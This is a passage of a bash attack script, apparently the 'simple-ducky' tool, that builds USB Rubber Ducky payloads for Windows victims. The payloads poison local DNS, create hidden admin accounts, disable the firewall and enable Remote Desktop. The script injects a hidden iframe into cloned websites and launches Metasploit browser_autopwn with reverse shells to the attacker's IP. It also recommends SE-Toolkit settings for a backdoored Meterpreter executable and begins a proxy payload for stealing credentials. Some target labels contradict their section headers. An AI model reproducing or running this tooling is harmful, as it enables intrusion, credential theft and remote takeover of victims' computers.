| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsWIN8uac.conf > /usr/share/simple-ducky/payload_del1.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mStopping your webserver...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 stop | |
| clear | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| clear | |
| echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e se-toolkit & | |
| clear | |
| echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo "1) Social-Engineering Attacks" | |
| echo "" | |
| echo "2) Website Attack Vectors" | |
| echo "" | |
| echo "3) Java Applet Attack Method" | |
| echo "" | |
| echo "4) Site Cloner" | |
| echo "" | |
| echo "5) Are you using NAT/Port Forwarding [yes|no]: no" | |
| echo "" | |
| echo "6) IP address or hostname for the reverse connection: $attackerip" | |
| echo "" | |
| echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)" | |
| echo "" | |
| echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter" | |
| echo "" | |
| echo "9) Backdoored Executable (BEST)" | |
| echo "" | |
| echo "10) PORT of the listener [443]: $attackerport" | |
| echo "" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | SE-Toolkit w/UAC (Windows 8) | |
| ################################################################################# | |
| f_setlocaldnsWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. Couple this attack with the SE-Toolkit's website cloner and you will be unstoppable." | |
| echo -e "\e[1;31mTarget:\e[0m Windows 8 with UAC disabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/setlocaldnsWIN8nouac.conf > /usr/share/simple-ducky/payload_del1.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del1.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mStopping your webserver...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 stop | |
| clear | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| clear | |
| echo -e "\e[1;34mLaunching the Socail Engineering Toolkit (se-toolkit).\e[0m" | |
| echo "" | |
| sleep 2 | |
| x-terminal-emulator -e se-toolkit & | |
| clear | |
| echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo -e "\e[1;34mHere are some recommended settings for the SE-Toolkit. Make changes as you see fit...\e[0m" | |
| echo "" | |
| sleep 2 | |
| echo "" | |
| echo "1) Social-Engineering Attacks" | |
| echo "" | |
| echo "2) Website Attack Vectors" | |
| echo "" | |
| echo "3) Java Applet Attack Method" | |
| echo "" | |
| echo "4) Site Cloner" | |
| echo "" | |
| echo "5) Are you using NAT/Port Forwarding [yes|no]: no" | |
| echo "" | |
| echo "6) IP address or hostname for the reverse connection: $attackerip" | |
| echo "" | |
| echo "7) Enter the url to clone: (Example: http://www.thisisafakesite.com)" | |
| echo "" | |
| echo "8) What payload do you want to generate: Windows Reverse_TCP Meterpreter" | |
| echo "" | |
| echo "9) Backdoored Executable (BEST)" | |
| echo "" | |
| echo "10) PORT of the listener [443]: $attackerport" | |
| echo "" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | Browser_Autopwn w/UAC (Win Vista/7) | |
| ################################################################################# | |
| f_autopwnlocaldnsVIS7uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance." | |
| echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Where do you want me to send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsVIS7uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLet's clone a website...\e[0m" | |
| echo "" | |
| read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn | |
| echo -e "" | |
| clear | |
| rm index.html | |
| clear | |
| rm /var/www/index.html | |
| clear | |
| echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m" | |
| echo "" | |
| sleep 2 | |
| wget $attackerfqdn | |
| echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html | |
| cp index.html /var/www/index.html | |
| rm index.html | |
| clear | |
| echo -e "\e[1;34mRestarting your Apache Server...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 restart | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 2 | |
| clear | |
| echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m" | |
| echo "" | |
| sleep 3 | |
| x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | Browser_Autopwn w/o UAC (Win Vista/7) | |
| ################################################################################# | |
| f_autopwnlocaldnsVIS7nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance." | |
| echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC disabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Where do you want me to send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsVIS7nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLet's clone a website...\e[0m" | |
| echo "" | |
| read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn | |
| echo -e "" | |
| clear | |
| rm index.html | |
| clear | |
| rm /var/www/index.html | |
| clear | |
| echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m" | |
| echo "" | |
| sleep 2 | |
| wget $attackerfqdn | |
| echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html | |
| cp index.html /var/www/index.html | |
| rm index.html | |
| clear | |
| echo -e "\e[1;34mRestarting your Apache Server...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 restart | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 2 | |
| clear | |
| echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m" | |
| echo "" | |
| sleep 3 | |
| x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | Browser_Autopwn w/UAC (Windows 8) | |
| ################################################################################# | |
| f_autopwnlocaldnsWIN8uac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance." | |
| echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Where do you want me to send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsWIN8uac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLet's clone a website...\e[0m" | |
| echo "" | |
| read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn | |
| echo -e "" | |
| clear | |
| rm index.html | |
| clear | |
| rm /var/www/index.html | |
| clear | |
| echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m" | |
| echo "" | |
| sleep 2 | |
| wget $attackerfqdn | |
| echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html | |
| cp index.html /var/www/index.html | |
| rm index.html | |
| clear | |
| echo -e "\e[1;34mRestarting your Apache Server...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 restart | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 2 | |
| clear | |
| echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m" | |
| echo "" | |
| sleep 3 | |
| x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Local DNS Poisoning | Browser_Autopwn w/o UAC (Windows 8) | |
| ################################################################################# | |
| f_autopwnlocaldnsWIN8nouac(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload is designed to setup local DNS poisioning on the victims machine. This payload uses Metasploit's Browser_Autopwn Auxilary module along with an evil iframe to perform the attack. In addition to the DNS poisoning this attack; creates an admin account, hides the admin account, drops the firewall, enables Remote Desktop & Remote Assistance." | |
| echo -e "\e[1;31mNote:\e[0m Not all websites like to be cloned using this method (wget)... Browser_autopwn is a finicky method to exploit browsers. If the victim's browser and computer are fully patched this method will likely fail." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7 with UAC enabled" | |
| echo -e "\e[1;31mAuthor:\e[0m Travis Weathers (skysploit) | props to ashbreeze96 and overwraith for the original concept" | |
| echo "" | |
| echo "" | |
| echo -e "\e[1;34mLet's start with the inject.bin file...\e[0m" | |
| echo "" | |
| read -p "What would you like the username to be for your admin account? " attackeruser | |
| echo "" | |
| read -p "What would you like the password to be for your admin account? " attackerpass | |
| echo "" | |
| read -p "What is the IP address of your attacking webserver? " attackerip | |
| echo "" | |
| read -p "What what website do you plan on spoofing (Don't use the FQDN)(example: example.com)? " attackerdomain | |
| echo -e "" | |
| read -p "Where do you want me to send your shell? " attackerip | |
| echo "" | |
| read -p "What port will you be listening on? " attackerport | |
| echo "" | |
| read -p "Use Milliseconds (15000 ms = 15 sec) " pausemilsec | |
| clear | |
| echo -e "\e[1;34mAlmost done. Let's set your keyboard language\e[0m" | |
| echo "" | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payloads/autopwnlocaldnsWIN8nouac.conf > /usr/share/simple-ducky/payload_del.txt | |
| sed "/STRING/s/attackerpass/$attackerpass/g" /usr/share/simple-ducky/payload_del.txt > /usr/share/simple-ducky/payload_del2.txt | |
| sed "/STRING/s/attackeruser/$attackeruser/g" /usr/share/simple-ducky/payload_del2.txt > /usr/share/simple-ducky/payload_del3.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del3.txt > /usr/share/simple-ducky/payload_del4.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del4.txt > /usr/share/simple-ducky/payload_del5.txt | |
| sed "/STRING/s/attackerip/$attackerip/g" /usr/share/simple-ducky/payload_del5.txt > /usr/share/simple-ducky/payload_del6.txt | |
| sed "/STRING/s/attackerdomain/$attackerdomain/g" /usr/share/simple-ducky/payload_del6.txt > /usr/share/simple-ducky/payload.txt | |
| sed -i "1iDELAY $pausemilsec" /usr/share/simple-ducky/payload.txt | |
| rm /usr/share/simple-ducky/payload_del.txt | |
| rm /usr/share/simple-ducky/payload_del2.txt | |
| rm /usr/share/simple-ducky/payload_del3.txt | |
| rm /usr/share/simple-ducky/payload_del4.txt | |
| rm /usr/share/simple-ducky/payload_del5.txt | |
| rm /usr/share/simple-ducky/payload_del6.txt | |
| clear | |
| read -p "Would you like to use a US keyboard a different format [Enter=US|o=other]? " language | |
| if [ "$language" == "o" ]; then | |
| function_lan | |
| read -p "Option: " keyboard | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -l $keyboard -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| else | |
| clear | |
| echo -e "\e[1;34mGenerating your inject.bin file...\e[0m" | |
| echo "" | |
| sleep 2 | |
| java -jar encoder.jar -i payload.txt -o inject.bin | |
| echo "" | |
| echo -e "\e[1;34mYour payload has been created, its located in /usr/share/simple-ducky\e[0m" | |
| echo "" | |
| read -p "Press any key to contiue" enter | |
| fi | |
| clear | |
| echo -e "\e[1;34mLet's clone a website...\e[0m" | |
| echo "" | |
| read -p "What's the FQDN that you would like to clone (example: https://www.example.com)? " attackerfqdn | |
| echo -e "" | |
| clear | |
| rm index.html | |
| clear | |
| rm /var/www/index.html | |
| clear | |
| echo -e "\e[1;34mCloning $attackerfqdn and injecting an evil iframe...\e[0m" | |
| echo "" | |
| sleep 2 | |
| wget $attackerfqdn | |
| echo "<iframe src="http://$attackerip:8080/duck" width="0" height="0">" >> index.html | |
| cp index.html /var/www/index.html | |
| rm index.html | |
| clear | |
| echo -e "\e[1;34mRestarting your Apache Server...\e[0m" | |
| echo "" | |
| sleep 2 | |
| service apache2 restart | |
| echo "" | |
| echo -e "\e[1;34mDone!\e[0m" | |
| sleep 2 | |
| clear | |
| echo -e "\e[1;34mLaunching Metasploit's Browser_Autopwn auxilary module...\e[0m" | |
| echo "" | |
| sleep 3 | |
| x-terminal-emulator -e msfcli auxiliary/server/browser_autopwn LHOST=$attackerip LPORT=$attackerport SRVPORT=8080 SRVHOST=0.0.0.0 URIPATH=/duck E & | |
| clear | |
| read -p "Would you like to return to the main menu [y/n]? " option | |
| xdg-open /usr/share/simple-ducky/ & | |
| clear | |
| case $option in | |
| y) simple-ducky ;; | |
| n) clear;exit ;; | |
| *) clear;exit ;; | |
| esac | |
| } | |
| ################################################################################# | |
| # Proxy in the Middle (PiTM) | no admin needed (Win XP/Vista/7) | |
| ################################################################################# | |
| f_proxyinthemiddleXPVIS7(){ | |
| clear | |
| echo -e "\e[1;31mDiscription:\e[0m This payload sets up a proxy server on the vicitims machine. It then launches Burpsuite and allows the attacker to see everything that the victim browses to and it will even hand over the credentials to any website visited." | |
| echo -e "\e[1;31mNote:\e[0m This payload does not require any admin access. Although, some corporate networks man have policies in place to block normal users from altering the proxy settings." | |
| echo -e "\e[1;31mTarget:\e[0m Windows Vista/7" | |
